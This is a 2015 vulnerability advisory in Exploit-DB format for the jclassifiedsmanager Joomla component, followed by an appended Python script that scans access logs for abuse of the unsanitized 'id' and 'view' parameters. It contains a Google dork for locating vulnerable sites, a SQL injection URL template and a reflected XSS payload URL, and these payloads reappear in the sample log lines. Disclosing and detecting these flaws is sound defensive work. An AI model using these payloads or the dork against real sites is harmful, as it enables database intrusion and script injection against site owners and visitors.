Vendor: jclassifiedsmanager
By: Sarath Nair aka AceNeon13
CVSS: 7.5 (HIGH)
CWE: 89, 79 (SQL Injection, XSS)
Product Name: jclassifiedsmanager
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE: cmsjunkie.com/classifieds-manager
Metasploit:
Other Scripts:
Platforms Tested:
2015

jclassifiedsmanager Multiple Vulnerabilities

The jclassifiedsmanager component is vulnerable to SQL Injection and XSS attacks. The 'id' parameter in the 'displayads' task is not sanitized, allowing an attacker to inject malicious SQL code. The 'view' parameter in the 'displayads' task is also not sanitized, allowing an attacker to inject arbitrary JavaScript code.

Mitigation:

The vendor has released a fix/patch for the vulnerabilities. Users are advised to update to the latest version of the software.

Exploit-DB raw data:

# Exploit Title: jclassifiedsmanager Multiple Vulnerabilities
# Google Dork: inurl:com_jclassifiedsmanager
# Date: 26 Jan 2015
# Exploit Author: Sarath Nair aka AceNeon13 
# Contact: @AceNeon13
# Greetings: HariKrishnan, Raj3sh.tv, Deepu.tv
# Vendor Homepage: cmsjunkie.com
# Software Link: http://www.cmsjunkie.com/classifieds-manager


# PoC Exploit: SQL Injection
-------------------------------- 
http://localhost/jclassifiedsmanager/classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=[SQL Injection Here]
"id" parameter is not sanitized.

# PoC Exploit: XSS Reflected
--------------------------------
http://localhost/jclassifiedsmanager/classifieds?view=displayads7ed3b"onload%3d"alert(1)"87d4d&layout=offerring&controller=displayads&adtype=1
"view" parameter is not sanitized.

########################################
# Vulnerability Disclosure Timeline:
 
2014-Dec-11:  Discovered vulnerability
2014-Dec-12:  Vendor Notification
2014-Dec-12:  Vendor Response/Feedback
2015-Jan-19:  Vendor Fix/Patch
2015-Jan-26:  Public Disclosure
#######################################
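
For sites that have not yet applied the vendor fix, the two unsanitized parameters can be watched for in web server access logs. The following is an added example, not part of the original advisory or the vendor's code: the allow-list patterns (numeric `id`, identifier-style `view`), the scoping on `controller=displayads` or `option=com_jclassifiedsmanager`, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed allow-lists (not from the advisory): a purely numeric ad id and a
# view name made only of letters, digits, '_', '.' and '-'.
ID_OK = re.compile(r"\d+")
VIEW_OK = re.compile(r"[A-Za-z0-9_.-]+")
# Request target inside a common/combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def check_request(target):
    """Return (param, decoded_value) pairs that fail the allow-lists."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    in_scope = ("displayads" in query.get("controller", [])
                or "com_jclassifiedsmanager" in query.get("option", []))
    if not in_scope:
        return []  # request is for some other component
    findings = []
    for param, rule in (("id", ID_OK), ("view", VIEW_OK)):
        for value in query.get(param, []):
            if not rule.fullmatch(value):
                findings.append((param, value))
    return findings


def scan(lines):
    """Return (line_number, param, decoded_value) for every suspicious hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits.extend((number, p, v) for p, v in check_request(match.group(1)))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Jan/2015:10:00:01 +0000] "GET /classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Jan/2015:10:02:13 +0000] "GET /classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=42%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [26/Jan/2015:10:02:40 +0000] "GET /classifieds?view=displayads7ed3b%22onload%3d%22alert(1)%2287d4d&layout=offerring&controller=displayads&adtype=1 HTTP/1.1" 200 4870',
    '198.51.100.2 - - [26/Jan/2015:10:03:02 +0000] "GET /index.php?option=com_content&view=article&id=7:welcome HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same two allow-list checks, applied server-side before the values reach the query or the page output, are the kind of input validation the advisory reports as missing.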